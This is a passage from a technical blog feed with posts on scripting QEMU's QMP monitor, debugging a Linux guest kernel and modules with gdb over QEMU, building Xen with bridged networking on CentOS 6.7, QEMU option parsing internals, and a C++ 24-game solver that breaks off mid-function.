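<p>On the wire, each QMP command is a JSON object with an "execute" key and optional "arguments", as seen in the telnet sessions above. A small helper that builds such a command (build_qmp_cmd is a hypothetical name, not part of QEMU):</p>

```python
import json

def build_qmp_cmd(name, **arguments):
    """Serialize one QMP command: {"execute": ..., "arguments": {...}}."""
    cmd = {"execute": name}
    if arguments:
        cmd["arguments"] = arguments
    return json.dumps(cmd)

assert json.loads(build_qmp_cmd("query-status")) == {"execute": "query-status"}
assert json.loads(build_qmp_cmd("device_del", id="net0"))["arguments"] == {"id": "net0"}
```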
<h3>Sending QMP commands automatically in batches</h3>
<p>Using the method from <a href="https://gist.github.com/sibiaoluo/9798832">here</a> you can automatically send QMP commands to the VM in batches, which is very useful for testing VM features. In my tests the UNIX-socket variant worked, but I could not get the TCP variant to work. In case the link goes stale, the code (a Python 2 script) is attached below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># QEMU Monitor Protocol Python class
#
# Copyright (C) 2009 Red Hat Inc.
#
# This work is licensed under the terms of the GNU GPL, version 2. See
# the COPYING file in the top-level directory.
import socket, json, time, sys
from optparse import OptionParser
class QMPError(Exception):
pass
class QMPConnectError(QMPError):
pass
class QEMUMonitorProtocol:
def connect(self):
print self.filename
self.sock.connect(self.filename)
data = self.__json_read()
if data == None:
raise QMPConnectError
if not data.has_key('QMP'):
raise QMPConnectError
return data['QMP']['capabilities']
def close(self):
self.sock.close()
def send_raw(self, line):
self.sock.send(str(line))
return self.__json_read()
def send(self, cmdline, timeout=30, convert=True):
end_time = time.time() + timeout
if convert:
cmd = self.__build_cmd(cmdline)
else:
cmd = cmdline
print("*cmdline = %s" % cmd)
print cmd
self.__json_send(cmd)
while time.time() < end_time:
resp = self.__json_read()
if resp == None:
return (False, None)
elif resp.has_key('error'):
return (False, resp['error'])
elif resp.has_key('return'):
return (True, resp['return'])
def read(self, timeout=30):
o = ""
end_time = time.time() + timeout
while time.time() < end_time:
try:
o += self.sock.recv(1024)
if len(o) > 0:
break
except:
time.sleep(0.01)
if len(o) > 0:
return json.loads(o)
else:
return None
def __build_cmd(self, cmdline):
cmdargs = cmdline.split()
qmpcmd = { 'execute': cmdargs[0], 'arguments': {} }
for arg in cmdargs[1:]:
opt = arg.split('=')
try:
value = int(opt[1])
except ValueError:
value = opt[1]
qmpcmd['arguments'][opt[0]] = value
print("*cmdline = %s" % cmdline)
return qmpcmd
def __json_send(self, cmd):
# XXX: We have to send any additional char, otherwise
# the Server won't read our input
self.sock.send(json.dumps(cmd) + ' ')
def __json_read(self):
try:
return json.loads(self.sock.recv(1024))
except ValueError:
return
def __init__(self, filename, protocol="tcp"):
if protocol == "tcp":
self.filename = ("localhost", int(filename))
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif protocol == "unix":
self.filename = filename
print self.filename
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
#self.sock.setblocking(0)
self.sock.settimeout(5)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option('-n', '--num', dest='num', default='10', help='Times want to try')
parser.add_option('-f', '--file', dest='port', default='4444', help='QMP port/filename')
parser.add_option('-p', '--protocol', dest='protocol',default='tcp', help='QMP protocol')
def usage():
parser.print_help()
sys.exit(1)
options, args = parser.parse_args()
print options
if len(args) > 0:
usage()
num = int(options.num)
qmp_filename = options.port
qmp_protocol = options.protocol
qmp_socket = QEMUMonitorProtocol(qmp_filename,qmp_protocol)
qmp_socket.connect()
qmp_socket.send("qmp_capabilities")
qmp_socket.close()
##########################################################
#Usage
#Options:
# -h, --help show this help message and exit
# -n NUM, --num=NUM Times want to try
# -f PORT, --file=PORT QMP port/filename
# -p PROTOCOL, --protocol=PROTOCOL
# QMP protocol
# e.g: # python xxxxx.py -n $NUM -f $PORT
##########################################################
</code></pre></div></div>
Debugging the Linux Kernel with QEMU 2016-06-21T00:00:00+00:00 http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/06/21/gdb-linux-kernel-by-qemu
<h3>Preface</h3>
<p>Anyone who moves from the Windows kernel to the Linux kernel probably misses Windows' kernel debugging facilities at first. In the early days, debugging the Linux kernel was very inconvenient: you either patched in kgdb or solved your problem with liberal use of printk. When I first encountered virtualization I realized it was the perfect setting for two-machine debugging, and soon found articles about debugging the Linux kernel with QEMU. For various reasons I never had the chance to try it until recently, when I finally spent a few days getting it to work. Since the material online is all much the same and omits many pitfalls, I wrote this article in the hope of helping others. I keep QEMU and KVM clearly separate: QEMU is the virtualization software, and KVM is the kernel module that accelerates QEMU by running guest code natively. The QEMU virtual machines mentioned in this article all use KVM acceleration by default.</p>
<p>Environment used in this article:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>A CentOS 7 x64 system inside VMware as the host
The QEMU virtual machine runs CentOS 6.7 x64
Guest kernel source version: 3.18.35
</code></pre></div></div>
<p>The kernel module source used, the simplest hello-world Linux driver, is provided at the end of this article.</p>
<h3>Creating the virtual machine</h3>
<p>For simplicity, install the virtualization environment via libvirt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum install qemu-kvm qemu-img virt-manager libvirt libvirt-python libvirt-client virt-install virt-viewer
</code></pre></div></div>
<p>Then create the virtual machine with virt-manager.</p>
<p>After the VM is created, download the kernel source from <a href="https://www.kernel.org/">kernel.org</a> (I used version 3.18.35) and modify the top-level Makefile, changing "-O2" on line 617 to "-O1". -O0 would of course be best, but as <a href="http://www.ibm.com/developerworks/cn/linux/1508_zhangdw_gdb/index.html">this article</a> explains, -O0 triggers a bug, and version 3.18.35 also fails to build with it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ifdef CONFIG_CC_OPTIMIZE_FOR_SIZE
KBUILD_CFLAGS += -Os $(call cc-disable-warning,maybe-uninitialized,)
else
KBUILD_CFLAGS += -O1   # change this line
</code></pre></div></div>
<p>Then replace the kernel in the VM. Pay attention to the KGDB options, which seem to be enabled by default:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make menuconfig
make
make modules_install
make install
</code></pre></div></div>
<p>This replaces the kernel in the QEMU virtual machine.</p>
<h3>Modifying the VM configuration file</h3>
<p>To debug the QEMU VM, we need libvirt to pass extra command-line arguments to the qemu process. Concretely: get the VM name from the second column of virsh list, then run virsh edit &lt;vm_name&gt; to modify the VM's configuration file. Two changes are needed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><domain type='kvm' xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'>
</code></pre></div></div>
<p>This is required for passing arguments through libvirt to qemu.</p>
<p>Add a qemu:commandline node after the last node, devices; note that it must come last:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <qemu:commandline>
<qemu:arg value='-S'/>
<qemu:arg value='-gdb'/>
<qemu:arg value='tcp::1234'/>
</qemu:commandline>
</code></pre></div></div>
<h3>Debugging a module in the QEMU VM</h3>
<p>First, create a Linux kernel source tree on the host at the same path as in the VM. For convenience, the kernel source in the VM lives in /root/linux-3.18.35, so you can simply run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scp -r linux-3.18.35 [email protected]:/root
</code></pre></div></div>
<p>Now the access paths are identical in the VM and on the host; the same applies to kernel modules.</p>
<p>Start gdb on the host and connect to the port, then start the VM in virt-manager; you will see the VM stop immediately. We discuss module debugging first, because kernel debugging has another pitfall covered later, so for now just continue execution with c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost gdb]# ./gdb ~/linux-3.18.35/vmlinux
GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /root/linux-3.18.35/vmlinux...done.
(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb)
</code></pre></div></div>
<p>When you break into the VM with ctrl-c, you may see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Remote 'g' packet reply is too long
</code></pre></div></div>
<p>A patch for this can be found <a href="https://sourceware.org/bugzilla/show_bug.cgi?id=13984">here</a>; apply it and the problem goes away.</p>
<p>Set a breakpoint on do_init_module, then run insmod poc.ko in the VM; the VM stops at the breakpoint. The parameter mod->sect_attrs->attrs holds the information for each section. In this hello-world driver there is only .text, no .bss or .data. We need to feed this information to gdb with the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>add-symbol-file xxx.ko <text addr> -s .data <data addr> -s .bss <bss addr>
</code></pre></div></div>
<p>After that you can single-step through the module. The whole session looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>^C
Program received signal SIGINT, Interrupt.
default_idle () at arch/x86/kernel/process.c:316
warning: Source file is more recent than executable.
316 trace_cpu_idle_rcuidle(PWR_EVENT_EXIT, smp_processor_id());
(gdb) b do_init_module
Breakpoint 1 at 0xffffffff810c5c0e: file kernel/module.c, line 3043.
(gdb) c
Continuing.
Breakpoint 1, do_init_module (mod=0xffffffffa02010e0) at kernel/module.c:3043
warning: Source file is more recent than executable.
3043 current->flags &= ~PF_USED_ASYNC;
(gdb) p /x mod->sect_attrs->attrs[1]->address
$1 = 0xffffffffa0201000
(gdb) add-symbol-file ~/hello/poc.ko 0xffffffffa0201000
add symbol table from file "/root/hello/poc.ko" at
.text_addr = 0xffffffffa0201000
(y or n) y
Reading symbols from /root/hello/poc.ko...done.
(gdb) b hello_init
Breakpoint 2 at 0xffffffffa020100d: file /root/hello/poc.c, line 7.
(gdb) c
Continuing.
Breakpoint 2, hello_init () at /root/hello/poc.c:7
7 struct task_struct *ts = current;
(gdb) n
8 printk("hello,world,%s\n",current->comm);
(gdb) p ts
$2 = (struct task_struct *) 0xffff88003c0b2190
(gdb) p ts->pid
$3 = 2629
(gdb) p ts->comm
$4 = "insmod\000erminal\000"
(gdb) n
9 ts = NULL;
(gdb) n
10 ts->pid=123;
(gdb) p ts
$5 = (struct task_struct *) 0x0 <irq_stack_union>
(gdb) p ts->pid
Cannot access memory at address 0x7f0
(gdb) n
</code></pre></div></div>
<h3>Debugging the guest kernel</h3>
<p>The steps above cover loadable modules. Many articles claim that you can debug the kernel simply by running b start_kernel as soon as the VM connects, but in reality the VM never stops at that breakpoint, nor at any other software breakpoint in kernel code.</p>
<p>After a long search I finally found the answer <a href="https://bugs.launchpad.net/ubuntu/+source/qemu-kvm/+bug/901944">here</a>. In one sentence: you must start with a hardware breakpoint; after that, software breakpoints work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb) hb start_kernel   # hardware breakpoint
Hardware assisted breakpoint 1 at 0xffffffff81b40044: file init/main.c, line 501.
(gdb) c
Continuing.
Breakpoint 1, start_kernel () at init/main.c:501
warning: Source file is more recent than executable.
501 {
(gdb) n
510 set_task_stack_end_magic(&init_task);
(gdb) n
511 smp_setup_processor_id();
(gdb) p init_task
$1 = {state = 0, stack = 0xffffffff81a00000 <init_thread_union>, usage = {
...
(gdb) b security_init
Breakpoint 2 at 0xffffffff81b6ff8a: file security/security.c, line 67.
(gdb) c
Continuing.
Breakpoint 2, security_init () at security/security.c:67
warning: Source file is more recent than executable.
67 printk(KERN_INFO "Security Framework initialized\n");
(gdb)
</code></pre></div></div>
<p>The hello-world Linux driver source used:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/init.h>
#include <linux/module.h>
#include <linux/sched.h>
static int hello_init(void)
{
struct task_struct *ts = current;
printk("hello,world,%s\n",current->comm);
ts = NULL;
ts->pid=123;
return 0;
}
static void hello_exit(void)
{
printk("goodbye,world\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>The Makefile; note -O0 to disable optimization:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m := poc.o
KDIR :=/lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
ccflags-y = -O0
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
</code></pre></div></div>
<h3>Notes</h3>
<ol>
<li>The directory layout must match between host and VM, both for the kernel and for your own modules</li>
<li>Remember to patch gdb</li>
<li>When debugging kernel code, remember to start with a hardware breakpoint</li>
</ol>
<h3>References</h3>
<ol>
<li><a href="http://www.ibm.com/developerworks/cn/linux/1508_zhangdw_gdb/index.html">Debugging the Linux Kernel and Modules with GDB and KVM (in Chinese)</a></li>
<li><a href="http://blog.vmsplice.net/2011/04/how-to-pass-qemu-command-line-options.html">How to pass QEMU command-line options through libvirt</a></li>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/qemu-kvm/+bug/901944">gdbserver inside qemu does not stop on breakpoints</a></li>
<li><a href="https://sourceware.org/bugzilla/show_bug.cgi?id=13984">Bug 13984 - gdb stops controlling a thread after “Remote ‘g’ packet reply is too long: …” error message</a></li>
</ol>
Setting Up a Bridged Network for Xen 4.5 VMs on CentOS 6.7 2016-05-13T00:00:00+00:00 http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/05/13/centos6xen4.5-bridge
<h3>Preface</h3>
<p>The previous article, <a href="http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/04/26/centos6xen4.5">Building Xen from Source on CentOS 6.7</a>, covered installing Xen from source. However, VMs created on that installation have no network access; this article sets up a bridged network for Xen VMs.</p>
<h3>Replacing NetworkManager with network</h3>
<p>The NetworkManager service on CentOS 6.7 does not support bridging, so we switch from NetworkManager to the network service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chkconfig NetworkManager off
chkconfig network on
service NetworkManager stop
service network start
</code></pre></div></div>
<p>Then create the file ifcfg-eth0 in /etc/sysconfig/network-scripts with the following content:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
</code></pre></div></div>
<p>After service network restart, the network service is in charge.</p>
<h3>Adding xenbr0</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>brctl addbr xenbr0
</code></pre></div></div>
<p>Modify /etc/sysconfig/network-scripts/ifcfg-eth0:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
BRIDGE=xenbr0
</code></pre></div></div>
<p>Add the file /etc/sysconfig/network-scripts/ifcfg-xenbr0:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=xenbr0
TYPE=Bridge
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
</code></pre></div></div>
<p>Then restart the network with service network restart. After that, using vif = ['mac=00:01:02:03:04:05,bridge=xenbr0'] in the VM configuration file no longer reports an error, and the Xen VM can reach the network. Replace the kernel inside the VM as well, and everything is compiled and controlled by yourself.</p>
Building Xen from Source on CentOS 6.7 2016-04-26T00:00:00+00:00 http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/04/26/centos6xen4.5
<h3>Preface</h3>
<p>Having long been used to the QEMU && KVM combination, I recently decided to try Xen and ran into many pitfalls, so I wrote this article to help others avoid them. Looking back at the build process, it is not hard to see why the community favored QEMU && KVM over Xen: that combination is architecturally simpler and cleaner, and easier to install and use, whereas Xen is full of traps. Still, walking through those traps yourself does build patience and a better understanding of Xen.</p>
<h3>Environment</h3>
<ol>
<li>Dom0: CentOS 6.7 x64, kernel version 3.18.24</li>
<li>Xen: 4.5.4</li>
</ol>
<h3>Installing the required packages</h3>
<p>The package list comes from <a href="http://wiki.xenproject.org/wiki/Compiling_Xen_From_Source">Compiling Xen From Source</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum groupinstall "Development Tools"
yum-builddep xen
yum install transfig wget tar less texi2html libaio-devel dev86 glibc-devel e2fsprogs-devel gitk mkinitrd iasl xz-devel bzip2-devel
yum install pciutils-libs pciutils-devel SDL-devel libX11-devel gtk2-devel bridge-utils PyXML qemu-common qemu-img mercurial texinfo
yum install libidn-devel yajl yajl-devel ocaml ocaml-findlib ocaml-findlib-devel python-devel uuid-devel libuuid-devel openssl-devel
yum install python-markdown pandoc systemd-devel glibc-devel.i686
</code></pre></div></div>
<p>Install dev86 as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://mirror.centos.org/centos/6/os/x86_64/Packages/dev86-0.16.17-15.1.el6.x86_64.rpm
rpm -ivh dev86-0.16.17-15.1.el6.x86_64.rpm
</code></pre></div></div>
<h3>Installing Xen</h3>
<p>Download Xen from the <a href="http://www.xenproject.org/">official site</a> or via git, then build and install it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./configure --prefix=/usr
make dist
make install
ldconfig
</code></pre></div></div>
<p>At this point the Xen kernel should appear under /boot. I was previously stuck here: building Xen on CentOS 7 kept failing with a "set sse instruction disable" error. After fiddling for a long time without success I switched to 6.7; open source can be unforgiving. The error is probably related to gdb's SSE compile options.</p>
<h3>Installing the Dom0 Kernel</h3>
<p>Use a newer kernel here; with Linux already at 4.x there is no reason to stay on 2.6, whose early Xen support was poor. I used 3.18.</p>
<p>After entering make menuconfig I could not find the Xen-related options anywhere. Even the widely circulated article from vpsee does not make this clear, probably because the author was so familiar with it that he skipped over it, which cost me several detours. I eventually found the answer on the official wiki (so do not be lazy: read the documentation properly).</p>
<p>Inside the make menuconfig interface, dependencies matter, so the most important first step is to enable</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Processor type and features | Linux guest support
</code></pre></div></div>
<p>and turn on everything underneath it in one go. The various Xen options then become visible; the Xen-related options live under these menus:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Processor type and features | Linux guest support
Device Drivers | Character devices
Device Drivers | Block device
Device Drivers | Network device support
Device Drivers | Xen driver support
</code></pre></div></div>
<p>Enable everything Xen-related above. There are also the CONFIG_CLEANCACHE and CONFIG_FRONTSWAP options, again under "Processor type and features". A small tip: inside make menuconfig, type "/" followed by a keyword to find which menu a given option lives in. When done, check your configuration against <a href="http://wiki.xenproject.org/wiki/Mainline_Linux_Kernel_Configs">Mainline Linux Kernel Configs</a>. Then you can happily build the kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make
make modules_install
make install
</code></pre></div></div>
<h3>Adding a Boot Entry</h3>
<p>Once the kernel is installed, the new kernel image appears under /boot, and a new entry should appear in /boot/grub/menu.lst. Copy the new kernel's entry to the end of the file and add the following line after the root line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kernel /xen-4.5.gz
</code></pre></div></div>
<p>Change the original kernel and initrd lines into module lines, so the entry looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>title Xen
root(hd0,0)
kernel /xen-4.5.gz
module /vmlinuz-3.18.24 xxxxxxxxxx
module /initramfs-3.18.24.img
</code></pre></div></div>
<h3>Miscellaneous</h3>
<p>After rebooting into the Xen entry, the xl command may still fail. If a shared library cannot be found, locate it in the installation directory and create a symlink. If the error is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xc: error: Could not obtain handle on privileged command interface (2 = No such file or directory): Internal error
</code></pre></div></div>
<p>then add a line to /etc/fstab:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>none /proc/xen xenfs defaults 0 0
</code></pre></div></div>
<p>Finally, remember to enable xencommons at boot:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chkconfig --level 5 xencommons on
</code></pre></div></div>
<h3>References</h3>
<ol>
<li><a href="http://wiki.xenproject.org/wiki/Compiling_Xen_From_Source">Compiling Xen From Source</a></li>
<li><a href="http://wiki.xenproject.org/wiki/Mainline_Linux_Kernel_Configs">Mainline Linux Kernel Configs</a></li>
<li><a href="http://www.vpsee.com/2014/07/compile-and-install-xen-from-source-code-on-centos-7-0/">Installing Xen 4.5 from Source on CentOS 7.0</a></li>
</ol>
QEMU Option Parsing2015-09-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/09/26/qemu-options
<h3>Preface</h3>
<p>With graduation approaching, I am organizing my virtualization notes before setting out on a new journey. I hope this becomes a series on virtualization theory and practice, covering (but not limited to) fundamentals, source-code analysis, translations of foreign articles, and demos. This first article analyzes QEMU's command-line option parsing.</p>
<h3>1. Analyzing QEMU with gdb</h3>
<ol>
<li>When running configure to generate the Makefile, pass --enable-kvm --enable-debug --target-list="x86_64-softmmu"</li>
<li>Download a minimal image, linux-0.2.img, from the QEMU site:
wget http://wiki.qemu.org/download/linux-0.2.img.bz2</li>
<li>
<p>Start QEMU under gdb:</p>
<p>gdb --args /usr/bin/bin/qemu-system-x86_64 linux-0.2.img -m 512 -enable-kvm -smp 1,sockets=1,cores=1,threads=1 -realtime mlock=off -device ivshmem,shm=ivshmem,size=1 -device ivshmem,shm=ivshmem1,size=2</p>
</li>
</ol>
<p>This many options are used deliberately: they make the discussion of QEMU's option parsing below easier to follow.</p>
<h3>2. QEMU Option Parsing</h3>
<p>QEMU defines the QEMUOption structure to represent a program option:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct QEMUOption {
const char *name;
int flags;
int index;
uint32_t arch_mask;
} QEMUOption;
</code></pre></div></div>
<p>vl.c defines a global array, qemu_options, that stores all available options:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const QEMUOption qemu_options[] = {
{ "h", 0, QEMU_OPTION_h, QEMU_ARCH_ALL },
#define QEMU_OPTIONS_GENERATE_OPTIONS
#include "qemu-options-wrapper.h"
{ NULL },
};
</code></pre></div></div>
<p>The qemu_options array is generated under the QEMU_OPTIONS_GENERATE_OPTIONS macro together with the qemu-options-wrapper.h header. Depending on whether QEMU_OPTIONS_GENERATE_ENUM, QEMU_OPTIONS_GENERATE_HELP, or QEMU_OPTIONS_GENERATE_OPTIONS is defined, qemu-options-wrapper.h expands the qemu-options.def file into different content. qemu-options.def itself is generated in the Makefile from qemu-options.hx by the scripts/hxtool script.</p>
<p>For now it is enough to know that qemu_options contains every possible option, including -enable-kvm, -smp, -realtime, and -device used above.</p>
<p>QEMU divides its options into a number of option groups; for example, -enable-kvm and -kernel both belong to the machine group.
Each group is represented by a QemuOptsList, and qemu-config.c defines:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static QemuOptsList *vm_config_groups[48];
</code></pre></div></div>
<p>so up to 48 groups are supported.
In main, qemu_add_opts registers each QemuOptsList into vm_config_groups:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> qemu_add_opts(&qemu_drive_opts);
qemu_add_drive_opts(&qemu_legacy_drive_opts);
qemu_add_drive_opts(&qemu_common_drive_opts);
qemu_add_drive_opts(&qemu_drive_opts);
qemu_add_opts(&qemu_chardev_opts);
qemu_add_opts(&qemu_device_opts);
qemu_add_opts(&qemu_netdev_opts);
qemu_add_opts(&qemu_net_opts);
qemu_add_opts(&qemu_rtc_opts);
qemu_add_opts(&qemu_global_opts);
qemu_add_opts(&qemu_mon_opts);
qemu_add_opts(&qemu_trace_opts);
qemu_add_opts(&qemu_option_rom_opts);
qemu_add_opts(&qemu_machine_opts);
qemu_add_opts(&qemu_mem_opts);
qemu_add_opts(&qemu_smp_opts);
qemu_add_opts(&qemu_boot_opts);
qemu_add_opts(&qemu_sandbox_opts);
qemu_add_opts(&qemu_add_fd_opts);
qemu_add_opts(&qemu_object_opts);
qemu_add_opts(&qemu_tpmdev_opts);
qemu_add_opts(&qemu_realtime_opts);
qemu_add_opts(&qemu_msg_opts);
qemu_add_opts(&qemu_name_opts);
qemu_add_opts(&qemu_numa_opts);
qemu_add_opts(&qemu_icount_opts);
qemu_add_opts(&qemu_semihosting_config_opts);
qemu_add_opts(&qemu_fw_cfg_opts);
</code></pre></div></div>
<p>Each QemuOptsList stores all the sub-options its group supports. For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static QemuOptsList qemu_realtime_opts = {
.name = "realtime",
.head = QTAILQ_HEAD_INITIALIZER(qemu_realtime_opts.head),
.desc = {
{
.name = "mlock",
.type = QEMU_OPT_BOOL,
},
{ /* end of list */ }
},
};
</code></pre></div></div>
<p>-realtime supports a single boolean sub-option, so only -realtime mlock=on/off is valid.
An option like -device is far less rigid: it prescribes no mandatory sub-options, since there are countless devices and no fixed list could cover them, so the argument string is simply split on "," and "=".
Each sub-option is represented by a QemuOpt structure, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct QemuOpt {
char *name;
char *str;
const QemuOptDesc *desc;
union {
bool boolean;
uint64_t uint;
} value;
QemuOpts *opts;
QTAILQ_ENTRY(QemuOpt) next;
}
</code></pre></div></div>
<p>name is the sub-option's key as a string, and str is the corresponding value.</p>
<p>QemuOptsList is not linked to QemuOpt directly; there is a layer in between, QemuOpts. For instance, the command line above specifies -device twice: both hang off the same QemuOptsList, but as two separate QemuOpts, each with its own chain of QemuOpt entries. QemuOpts is defined as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct QemuOpts {
char *id;
QemuOptsList *list;
Location loc;
QTAILQ_HEAD(QemuOptHead, QemuOpt) head;
QTAILQ_ENTRY(QemuOpts) next;
};
</code></pre></div></div>
<p>The overall structure looks like this:</p>
<p><img src="/assets/img/qemuoptions/1.PNG" alt="" /></p>
<p>For the options used in this article, the result is as follows (some options, such as -m, are omitted):</p>
<p><img src="/assets/img/qemuoptions/2.PNG" alt="" /></p>
<p>Reference: <a href="https://www.ibm.com/developerworks/community/blogs/5144904d-5d75-45ed-9d2b-cf1754ee936a/entry/qemu_2_%25e5%258f%2582%25e6%2595%25b0%25e8%25a7%25a3%25e6%259e%2590?lang=en">QEMU 2: Option Parsing</a></p>
<p>The IBM article is not easy to follow, and it contains some errors toward the end.</p>
Printing All Solutions to the 24 Game2015-08-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/08/25/pointgame
<p>In the 24 game you pick four numbers and combine them with addition, subtraction, multiplication, and division, parentheses allowed, to reach 24. "Beauty of Programming" explains the solution methods well; I use its second approach directly. When merging the S sets, though, you should not deduplicate as the book suggests: entries with equal values may come from different computations, and deduplicating there loses valid solutions. The right place to deduplicate is at the end, when counting the 24s in S[15]. The program's output:</p>
<p><img src="/assets/img/pointgame/1.PNG" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <vector>
#include <set>
#include <algorithm>
#include <iterator>
#include <string>
#include <limits>
#include <initializer_list>
#include <cmath>
using namespace std;
const double threHold = 1E-6;
struct Node
{
double value;
string exp;
Node(double v, string s) :value(v), exp(s){}
friend bool operator < (const Node &node1, const Node &node2)
{
return node1.value < node2.value;
}
};
class PointGameSolver
{
public:
PointGameSolver(initializer_list<double> li) :init(li)
{
S = new multiset<Node>[static_cast<int>(pow(2, init.size()))];
}
int getResult(set<string>& ans)
{
ans.clear();
calc();
return check(ans);
}
~PointGameSolver()
{
delete[] S;
}
private:
int check(set<string>& result);
multiset<Node> setS(int i);
multiset<Node> getUnion(multiset<Node> a, multiset<Node> b);
multiset<Node> fork(multiset<Node> a, multiset<Node> b);
void calc();
multiset<Node> *S;
vector<double> init;
};
int PointGameSolver::check(set<string>& result)
{
int count = 0;
multiset<Node> ans = S[static_cast<int>(pow(2, init.size()) - 1)];
for (auto it = ans.begin(); it != ans.end(); ++it)
{
if ((it->value - 0) > threHold && fabs(it->value - 24) < threHold)
{
count++;
result.insert(it->exp);
}
}
return result.size();
}
multiset<Node> PointGameSolver::setS(int i)
{
if (!S[i].empty())
return S[i];
for (int x = 1; x < i; ++x)
{
if ((x & i) == x)
S[i] = getUnion(S[i], fork(setS(x), setS(i - x)));
}
return S[i];
}
multiset<Node> PointGameSolver::getUnion(multiset<Node> a, multiset<Node> b)
{
multiset<Node> result;
copy(a.begin(), a.end(), inserter(result, result.begin()));
copy(b.begin(), b.end(), inserter(result, result.begin()));
return result;
}
multiset<Node> PointGameSolver::fork(multiset<Node> a, multiset<Node> b)
{
if (a.empty())
return b;
if (b.empty())
return a;
multiset<Node> result;
for (auto ita = a.begin(); ita != a.end(); ++ita)
{
for (auto itb = b.begin(); itb != b.end(); ++itb)
{
result.insert(Node(ita->value + itb->value, "(" + ita->exp + "+" + itb->exp + ")"));
result.insert(Node(ita->value * itb->value, "(" + ita->exp + "*" + itb->exp + ")"));
result.insert(Node(ita->value - itb->value, "(" + ita->exp + "-" + itb->exp + ")"));
result.insert(Node(itb->value - ita->value, "(" + itb->exp + "-" + ita->exp + ")"));
